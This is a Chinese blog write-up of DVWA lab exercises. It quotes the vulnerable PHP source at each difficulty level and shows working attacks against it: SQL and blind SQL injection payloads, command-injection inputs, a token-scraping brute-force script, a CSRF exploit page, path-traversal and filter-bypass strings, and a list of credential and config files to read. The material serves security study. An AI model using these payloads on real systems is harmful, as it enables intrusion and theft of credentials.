DVWA学习笔记

转自个人博客0pt1mus
这次的DVWA的学习笔记最后一次更新，对DVWA的整个靶场环境进行了一次基本完善的测试，对除了验证码之外的其他漏洞进行了系统学习。中间一些互通的地方并没有完善，望大家阅读中可以注意一下这个问题，望担待。

sql injection：

low

首先，通过返回的报错信息判断是否存在注入点，并判断注入点的类型是数字型还是字符型。

# 判断注入可以直接输入'或1’
# 首先判断是否为数字型的
1 and 1=1					# 有返回
1 and 1=2					# 有返回
# 证明该处的逻辑后台并没有进行处理

# 测试字符型
1' and '1'='1 		# 有返回
1' and '1'='2			# 无返回
# 证明这里的逻辑后台处理了，因此判断该处为字符型注入

知道存在字符型注入点，现在要测试有几个字段，构造sql语句：

1' order by 3;#
1' order by 2;#

通过二分法判断，最后得出查询的字段有两个。

接下来我们就可以通过联合查询来对这两个位置进行注入。

# 查询数据库版本
1' union select 1,version();#

# 查询数据库名
1' union select 1,database();#

# 查询dvwa数据库的表名称
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa';#

# 查询表users的列
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users';#

# 查询user、password的内容
1' union select user,password from users;#

Medium

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = mysql_real_escape_string( $id );

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysql_query( $query ) or die( '
' . mysql_error() . '
' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Display values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "
ID: {$id}
First name: {$first}
Surname: {$last}
";

        // Increase loop count
        $i++;
    }

    //mysql_close();
}

?>

观察页面，发现是通过下拉框来点击选择ID，我们有bp抓包，发现通过POST请求将ID传递给服务器，因此我们可以通过hack bar修改POST请求包进行注入。

源码发现中间通过函数mysql_real_escape_string()将特殊的字符全部转义了，所以我们可以通过十六进制绕过。

High

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysql_query( $query ) or die( '
Something went wrong.
' );

    // Get results
    $num = mysql_numrows( $result );
    $i   = 0;
    while( $i < $num ) {
        // Get values
        $first = mysql_result( $result, $i, "first_name" );
        $last  = mysql_result( $result, $i, "last_name" );

        // Feedback for end user
        echo "
ID: {$id}
First name: {$first}
Surname: {$last}
";

        // Increase loop count
        $i++;
    }

    mysql_close();
}

?>

可以发现在sql语句中添加了limit 1限制了返回的数据只有一条。我们可以在查询语句中通过将后面的语句注释掉来进行绕过。

这里提交sql语句和查询结果显示的界面不在一块，是为了防止一般的sqlmap注入。

Impossible

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();

        // Make sure only 1 result is returned
        if( $data->rowCount() == 1 ) {
            // Get values
            $first = $row[ 'first_name' ];
            $last  = $row[ 'last_name' ];

            // Feedback for end user
            echo "
ID: {$id}
First name: {$first}
Surname: {$last}
";
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

首先添加了Anti-CSRF token，又对输入的id判断是否为数字，是数字才能进行下一步的操作，并且使用了PDO对sql语句进行了预编译。最后查询结果必须只有一条，才进行输出。

SQL Injection（Blind）

low

SQL Injection（Blind），即SQL盲注，与一般注入的区别在于，一般的注入攻击者可以直接从页面上看到注入语句的执行结果，而盲注时攻击者通常是无法从显示页面上获取执行结果，甚至连注入语句是否执行都无从得知，因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。

基本的盲注有时间盲注，bool盲注和报错盲注。

bool盲注：

因为返回的只有是或否，所以我们可以通过bool值进行判断。

1' and user()='root@localhost';
1' and user() like 'ro%';

时间盲注：

时间盲注中，我们通过判断返回的时候是否执行了函数sleep。我们通过if来进行判断，如果判断值为真，执行sleep函数，如果判断为假，不执行sleep函数。

and if(ascii(mid(select group_concat(column_name) from information_schema.columns where table_schema =0x73716C74657374 and table_name =0x61646D696E), 1, 1)) = 0,sleep(5),1);

拆解上面的sql语句，就是执行select语句，查询结果从第一个位置取其ascii码与0进行比较，若返回真，执行slee(5)，若返回假，返回1。

Brute Force

low

我们可以采用Burp suite抓包后，进行字典暴力破解。

可以根据返回的length进行判断，只有admin/password的长度和别的不同，打开发现，登录成功。

medium

if( isset( $_GET[ 'Login' ] ) ) {
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = mysql_real_escape_string( $user );

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = mysql_real_escape_string( $pass );
    $pass = md5( $pass );

    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysql_query( $query ) or die( '
' . mysql_error() . '
' );

    if( $result && mysql_num_rows( $result ) == 1 ) {
        // Get users details
        $avatar = mysql_result( $result, 0, "avatar" );

        // Login successful
        echo "
Welcome to the password protected area {$user}
";
        echo "{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( 2 );
        echo "

Username and/or password incorrect.
";
    }

    mysql_close();
}

?>

查看源码，发现函数mysql_real_escape_string()，作用是转义 SQL 语句中使用的字符串中的特殊字符（\x00，\n，\r，\，‘，“，\x1a）。基本可以抵抗SQL注入。

并且在验证错误的时候，会sleep(2)睡眠两秒，但任然可以和low级一样，进行bp的爆破。

high

if( isset( $_GET[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = stripslashes( $user );
    $user = mysql_real_escape_string( $user );

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = mysql_real_escape_string( $pass );
    $pass = md5( $pass );

    // Check database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysql_query( $query ) or die( '
' . mysql_error() . '
' );

    if( $result && mysql_num_rows( $result ) == 1 ) {
        // Get users details
        $avatar = mysql_result( $result, 0, "avatar" );

        // Login successful
        echo "
Welcome to the password protected area {$user}
";
        echo "{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( rand( 0, 3 ) );
        echo "

Username and/or password incorrect.
";
    }

    mysql_close();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

stripslashes():去除string中的反斜杠\。

mysql_real_escape_string():转义 SQL 语句中使用的字符串中的特殊字符（\x00，\n，\r，\，‘，“，\x1a）。

还用了Anti-CSRF token抵御CSRF。

然后我们再在网页的源码中发现隐藏的user_token。

我们尝试提交一次请求，发现url中含有参数user-token。

因此，判断该登录的逻辑为，后台通过generateSessionToken()产生token，然后传递到前端隐藏掉，在发起登录请求时，将user_token也传到后端，然后进行check，因此，爆破的时候不能再用bp进行。

通过python脚本来进行爆破，先请求服务器获得token，然后开始爆破。

# 还可以将该脚本改成多线程的形式，加快速度

from bs4 import BeautifulSoup
import requests

header = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh,en;q=0.9,zh-CN;q=0.8',
    'Cache-Control': 'no-cache',
    'Connection': 'keep-alive',
    'Cookie': 'security=high; PHPSESSID=364ucqbn2j1mucgtmkpes17fd1',
    'Host': '172.16.34.167',
    'Pragma': 'no-cache',
    'Referer': 'http://172.16.34.167/dvwa/vulnerabilities/brute/',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'
}

requrl = 'http://172.16.34.167/dvwa/vulnerabilities/brute/'


def get_token(requrl, header):
    resp = requests.get(requrl, headers=header)
    print(resp.status_code, len(resp.content))
    soup = BeautifulSoup(resp.content, 'html.parser')
    input = soup.select('input[type=hidden]')
    user_token = input[0]['value']
    return user_token


user_token = get_token(requrl, header)
i = 0

with open(file='/Users/optimus/tools/dict/passwords_quick.txt', 'r') as f:
    for line in f.readlines():
        requrl = 'http://172.16.34.167/dvwa/vulnerabilities/brute/?username=admin&password=' + \
            line + '&Login=Login&user_token=' + user_token
        i += 1
        print(i, 'admin', line.strip(), end='  ')
        user_token = get_token(requrl, header)
        if(i == len(f.readlines())):
            break

运行结果：

通过返回长度，可以判断账号/密码:admin/password。

Impossible

if( isset( $_POST[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_POST[ 'username' ];
    $user = stripslashes( $user );
    $user = mysql_real_escape_string( $user );

    // Sanitise password input
    $pass = $_POST[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = mysql_real_escape_string( $pass );
    $pass = md5( $pass );

    // Default values
    $total_failed_login = 3;
    $lockout_time       = 15;
    $account_locked     = false;

    // Check the database (Check user information)
    $data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR );
    $data->execute();
    $row = $data->fetch();

    // Check to see if the user has been locked out.
    if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) )  {
        // User locked out.  Note, using this method would allow for user enumeration!
        //echo "

This account has been locked due to too many incorrect logins.
";

        // Calculate when the user would be allowed to login again
        $last_login = $row[ 'last_login' ];
        $last_login = strtotime( $last_login );
        $timeout    = strtotime( "{$last_login} +{$lockout_time} minutes" );
        $timenow    = strtotime( "now" );

        // Check to see if enough time has passed, if it hasn't locked the account
        if( $timenow > $timeout )
            $account_locked = true;
    }

    // Check the database (if username matches the password)
    $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR);
    $data->bindParam( ':password', $pass, PDO::PARAM_STR );
    $data->execute();
    $row = $data->fetch();

    // If its a valid login...
    if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {
        // Get users details
        $avatar       = $row[ 'avatar' ];
        $failed_login = $row[ 'failed_login' ];
        $last_login   = $row[ 'last_login' ];

        // Login successful
        echo "
Welcome to the password protected area {$user}
";
        echo "{$avatar}\" />";

        // Had the account been locked out since last login?
        if( $failed_login >= $total_failed_login ) {
            echo "
Warning: Someone might of been brute forcing your account.
";
            echo "
Number of login attempts: {$failed_login}.
Last login attempt was at: ${last_login}.
";
        }

        // Reset bad login count
        $data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );
        $data->bindParam( ':user', $user, PDO::PARAM_STR );
        $data->execute();
    }
    else {
        // Login failed
        sleep( rand( 2, 4 ) );

        // Give the user some feedback
        echo "

Username and/or password incorrect.

Alternative, the account has been locked because of too many failed logins.
If this is the case, please try again in {$lockout_time} minutes.
";

        // Update bad login count
        $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );
        $data->bindParam( ':user', $user, PDO::PARAM_STR );
        $data->execute();
    }

    // Set the last login time
    $data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );
    $data->bindParam( ':user', $user, PDO::PARAM_STR );
    $data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

可以看到，Impossible在high的基础上，增加了登录失败次数的检测，登录失败次数超了3次，将会将账号锁定15秒。而且使用了PDO（PHP Data Object）机制来抵御SQL注入，PDO扩展已经封装了SQL的语句，没有办法打破SQL语句的结构来执行想要的结果，一次也避免了SQL注入。

Command Injection

low

这里我们要熟悉两种符号：

符号	含义	例子
｜	管道，将前面的输出作为后面的输入。	ls | more
&	前面一个执行完，执行后面的	ls & cd …
&&	当前面的执行成功后才执行后面的，否则不再执行	touch 1.txt && cat 1.txt
;	无论前一个执行完没有，后面的接着执行	ls ; cd …

在这里，我们直接通过&可以实现命令行注入。

127.0.0.1 & dir

Medium

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Set blacklist
    $substitutions = array(
        '&&' => '',
        ';'  => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "
{$cmd}
";
}

?>

分析源码，我们可以看到，将输入的&&和;都过滤掉了，因此无法用这两种符号来进行命令行注入。

但是我们还可以利用&来进行注入。

输入：127.0.0.1&dir

还有一种绕过方法是：127.0.0.1&;&net user。

因为会将;替换为空，因此输入变为了127.0.0.1&&net user。

high

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = trim($_REQUEST[ 'ip' ]);

    // Set blacklist
    $substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "
{$cmd}
";
}

?>

我们可以看到，这里过滤的符号更多。

'&'  => '',
';'  => '',
'| ' => '',
'-'  => '',
'$'  => '',
'('  => '',
')'  => '',
'`'  => '',
'||' => '',

这里进一步完善了黑名单，但是仔细观察可以发现，第三个|是在竖线后面多了一个空格，所以我们依然可以绕过。

127.0.0.1|net user

Impossible

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $target = $_REQUEST[ 'ip' ];
    $target = stripslashes( $target );

    // Split the IP into 4 octects
    $octet = explode( ".", $target );

    // Check IF each octet is an integer
    if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
        // If all 4 octets are int's put the IP back together.
        $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];

        // Determine OS and execute the ping command.
        if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
            // Windows
            $cmd = shell_exec( 'ping  ' . $target );
        }
        else {
            // *nix
            $cmd = shell_exec( 'ping  -c 4 ' . $target );
        }

        // Feedback for the end user
        echo "
{$cmd}
";
    }
    else {
        // Ops. Let the user name theres a mistake
        echo '
ERROR: You have entered an invalid IP.
';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

分析源码：

stripslashes():删除反斜杠\。

explode():将字符串打散成列表。

可以发现添加了Anti-CSRF token，每次都会随机一个token和服务端check。

并且将输入的字符串通过.打散，然后判断列表的每一个元素是否为数字，若都为数字再组合成ip地址的形式。

因此不存在命令行注入。

CSRF(跨站请求伪造)

low

我们首先要了解CSRF具体指的是什么，我们可以理解为当用户A登录了网站B，攻击者C知道网站B的一项功能的请求url，那么攻击者A构造这一url，发送给用户A，用户A点击该链接，产生的行为就是在用户A未知的情况下，伪造A的身份进行的操作，可以是改密码，转账等敏感行为。

在实践中，我们使用的url为：http://172.16.34.167/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change

直接访问这个链接的话，很明显这个链接的目的是更改密码，因此我们可以用短链接的形式来隐藏真实的url。但是访问后，仍会显示更改密码成功后的页面，因此，我们可以构造一个exp页面来实现攻击。

<html>
	<head>
    <title>404title>
  head>
  <body>
    <img src="http://172.16.34.167/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change" style="display:none;"/>
    <h1>404h1>
  	<h2>
      file not found.
    h2>
  body>
html>

medium

if( isset( $_GET[ 'Change' ] ) ) {
    // Checks to see where the request came from
    if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) ) {
        // Get input
        $pass_new  = $_GET[ 'password_new' ];
        $pass_conf = $_GET[ 'password_conf' ];

        // Do the passwords match?
        if( $pass_new == $pass_conf ) {
            // They do!
            $pass_new = mysql_real_escape_string( $pass_new );
            $pass_new = md5( $pass_new );

            // Update the database
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
            $result = mysql_query( $insert ) or die( '
' . mysql_error() . '
' );

            // Feedback for the user
            echo "
Password Changed.
";
        }
        else {
            // Issue with passwords matching
            echo "
Passwords did not match.
";
        }
    }
    else {
        // Didn't come from a trusted source
        echo "
That request didn't look correct.
";
    }

    mysql_close();
}

?>

这里用eregi()比较$_SERVER['SERVER_NAME']和$_SERVER['HTTP_REFERER']是否相同，也就是判断request头中的referer中是否有host。若不同的话，不会进行之后的操作。

因此我们需要使来源网站包含目标ip，即172.16.34.167，所以我们将exp网页的名字改为172.16.34.167.html即可。

High

if( isset( $_GET[ 'Change' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];

    // Do the passwords match?
    if( $pass_new == $pass_conf ) {
        // They do!
        $pass_new = mysql_real_escape_string( $pass_new );
        $pass_new = md5( $pass_new );

        // Update the database
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
        $result = mysql_query( $insert ) or die( '
' . mysql_error() . '
' );

        // Feedback for the user
        echo "
Password Changed.
";
    }
    else {
        // Issue with passwords matching
        echo "
Passwords did not match.
";
    }

    mysql_close();
}

// Generate Anti-CSRF token
generateSessionToken();

?>

我们可以看到这里是添加了一个Anti-CSRF token，每次访问都会产生一个随机值，我们在更改密码时都需要提交这个随机值和服务器上的进行匹配。

之前找到的ifram获取token的方法，尝试之后发现因为同源策略的问题，没有办法获取到，因此需结合其他方法获得。

File Inclusion

low

// The page we wish to display
$file = $_GET[ 'page' ];

?>

我们首先点击file1.php，观察包含文件在url中。

因此我们可以构造url中的参数，找服务器中的敏感文件。

我们首先输入一个http://172.16.34.167/dvwa/vulnerabilities/fi/?page=/etc/passwd

可以看到报错信息，发现网站存放的绝对路劲。

以下贴出查到的一些敏感文件。

Windows:

c:/boot.ini #查看系统版本 
c:/windows/php.ini #php配置信息 
c:/windows/my.ini #MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码 
c:/winnt/php.ini 
c:/winnt/my.ini 
c:\mysql\data\mysql\user.MYD #mysql.user表中的数据库连接密码 
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini #存储了虚拟主机网站路径和密码 
c:\Program Files\Serv-U\ServUDaemon.ini 
c:\windows\system32\inetsrv\MetaBase.xml #查看IIS的虚拟主机配置 
c:\windows\repair\sam #WINDOWS系统初次安装的密码 
c:\Program Files\ Serv-U\ServUAdmin.exe #6.0版本以前的serv-u管理员密码 
c:\Program Files\RhinoSoft.com\ServUDaemon.exe 
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件  #存储了pcAnywhere的登陆密码 
c:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf #查看WINDOWS系统apache文件 
c:/Resin-3.0.14/conf/resin.conf #查看jsp开发的网站resin文件配置信息. 
c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf #查看linux系统配置的JSP虚拟主机 
d:\APACHE\Apache2\conf\httpd.conf 
C:\Program Files\mysql\my.ini 
C:\mysql\data\mysql\user.MYD #存在MYSQL系统中的用户密码 
C:\Windows\System32\drivers\etc\hosts
winserver配置
Telnet信息

Linux/Unix:

/usr/local/app/apache2/conf/httpd.conf #apache2缺省配置文件  
/usr/local/apache2/conf/httpd.conf  
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf #虚拟网站设置  
/usr/local/app/php5/lib/php.ini #PHP相关设置 
/etc/sysconfig/iptables #从中得到防火墙规则策略  
/etc/httpd/conf/httpd.conf #apache配置文件  
/etc/rsyncd.conf #同步程序配置文件  
/etc/my.cnf #mysql的配置文件  
/etc/redhat-release #系统版本  
/etc/issue  
/etc/issue.net

etc/passwd #存储操作系统用户信息,该文件为所有用户可见
用户名: 密码 : uid  : gid :用户描述：主目录：登陆shell
密码：x表示暗文,相反为明文

uid：userid,”0”为root ID.1-99为系统保留,分配给系统预定义帐号。Linux用户可以分为3类：超级用户（root）、管理用户和普通用户
 
　　伪用户（psuedo users）
　　　　bin #拥有可执行的用户命令文件
　　　　sys #拥有系统文件
　　　　adm #拥有账户文件
　　　　uucp #UUCP使用
　　　　Ip #Ip或lpd子系统使用
　　　　nobody #NFS使用
　　　　audit
　　　　cron
　　　　mail
　　　　usenet

gid:字段记录的是用户所属的用户组。对应着/etc/group文件中的一条记录
　用户描述：字段记录着用户的一些个人情况，例如用户的真实姓名、电话、地址等
　　
  主目录：用户的起始工作目录
　
  登陆shell：
　　　　　　常用shell - sh(BourneShell),csh(CShell),ksh(KornShell),tcsh(TENEX/TOPS-20typeCShell),bash(BourneAgainShell)
　　　　　　/bin/sh #默认登录Shell   /sbin/nologin #代表用户不能登录
 
/etc/shadow
username: passwd: lastchg: min: max: warn: inactive: expire: flag
登录名:加密口令:最后一次修改时间:最小时间间隔:最大时间间隔:警告时间:不活动时间:失效时间:标志

口令 - 加密后的用户口令字，13个字符；如果为空/用户没有口令；如含有不属于集合{./0-9A-Za-z}中的字符/用户不能登录
最后一次修改时间 - 表示的是从某个时刻起，到用户最后一次修改口令时的天数。时间起点对不同的系统可能不同
最小时间间隔 - 两次修改口令之间所需的最小天数
最大时间间隔 - 口令保持有效的最大天数
警告时间  - 从系统开始警告用户到用户密码正式失效之间的天数
不活动时间 - 用户没有登录活动但账号仍能保持有效的最大天数
失效时间 - 账号的生存期。
保留条目 - 无用字段


/etc/group 存储有关本地用户组的信息
一个组中可以有多个用户，一个用户也可以属于不同的组。当一个用户同时是多个组中的成员时，在/etc/passwd文件中记录的是登录时所属的默认组
用户要访问属于附加组的文件时，必须首先使用newgrp命令使自己成为所要访问的组中的成员
1）groupname GID #组名
2）password #密码位置
3）GID #组ID
4）user #组成员





 
/usr/local/app/php5/lib/php.ini #PHP相关设置 
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf #虚拟网站设置 
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf #linux APACHE虚拟主机配置文件 
/usr/local/resin-3.0.22/conf/resin.conf #3.0.22的RESIN配置文件 
/usr/local/resin-pro-3.0.22/conf/resin.conf /usr/local/app/apache2/conf/extra/httpd-vhosts.conf #APASHE虚拟主机
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf /httpd.conf #linux APACHE虚拟主机配置文件 
/usr/local/resin-3.0.22/conf/resin.conf #3.0.22的RESIN配置文件
/usr/local/resin-pro-3.0.22/conf/resin.conf /usr/local/app/apache2/conf/extra/httpd-vhosts.conf #APASHE虚拟主机 
/etc/sysconfig/iptables #查看防火墙策略 
/root/.mysql_history、/root/.bash_history      #Mysql账号密码信息

我们在这里还可以利用路径回溯：../../../../来寻找敏感文件。

在php的环境下，我们还可以读取php.ini，来查看php的配置。

php版本小于5.3.4，并且Magic_quote_gpc为off时，可以使用%00截断。

当配置中，allow_url_fopen与allow_url_include开启时，还可以包含远程服务器的文件，若对文件还没有检查，可导致远程代码执行。

Medium

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

可以看到，对传入参数进行了过滤，将http://、https://、../、..\都进行了过滤，替换为空。

我们可以使用双写的方法进行绕过。如：

htthttps://ps://

..././

High

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

发现通过fnmatch()只能包含file开头的文件，那么我们可以通过file协议来进行绕过。

http://172.16.34.167/dvwa/vulnerabilities/fi/page=file:///C:/flag/flag.txt

然后是任意代码执行，需要结合文件上传，然后找到上传文件的绝对路径，将文件用file协议包含进来。

Impossible

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

使用了白名单的手段，只允许include.php、file1.php、file2php、file3.php。

File Upload

low

low等级的没有任何的过滤和防护，所以首先尝试上传一句话，发现没法上传，可能和php的版本问题有关，我们之后又上传探针，成功。

Medium

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '
Your image was not uploaded.
';
        }
        else {
            // Yes!
            echo "
{$target_path} succesfully uploaded!
";
        }
    }
    else {
        // Invalid file
        echo '
Your image was not uploaded. We can only accept JPEG or PNG images.
';
    }
}

?>

我们可以看到源码中添加了过滤，只能上传类型为image/jpeg或image/png，并且文件的大小要小于100000。

考虑用bp抓包，然后更改Content-Type为image/jpeg来尝试绕过。

成功上传。

High

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '
Your image was not uploaded.
';
        }
        else {
            // Yes!
            echo "
{$target_path} succesfully uploaded!
";
        }
    }
    else {
        // Invalid file
        echo '
Your image was not uploaded. We can only accept JPEG or PNG images.
';
    }
}

?>

其中，需要介绍的函数有

函数	解释
substr(string, start, length)	在string中，从start处开始截取length长度的字符串返回。
strrpos(string, find)	查找find在string中最后出现的位置。

High等级将上传文件的文件后缀取出来，判断最后一个.后面的后缀是否为jpg、jpeg、png。若不是则无法上传。

因为最后是检验最后一个点后面的后缀名，因此可以考虑使用0x00截断。

关于0x00和%00的关系，我们可以在安~然的这篇博文上找到答案。

之后bp时间后发现没有实现，查资料发现是php<5.3.4才可能存在此漏洞。

之后又尝试了图片类型的一句话木马，可上传成功，但是访问时无法解析解析php代码，因此初步判断为环境的问题（太菜…）。

Impossible

if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );


    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) &&
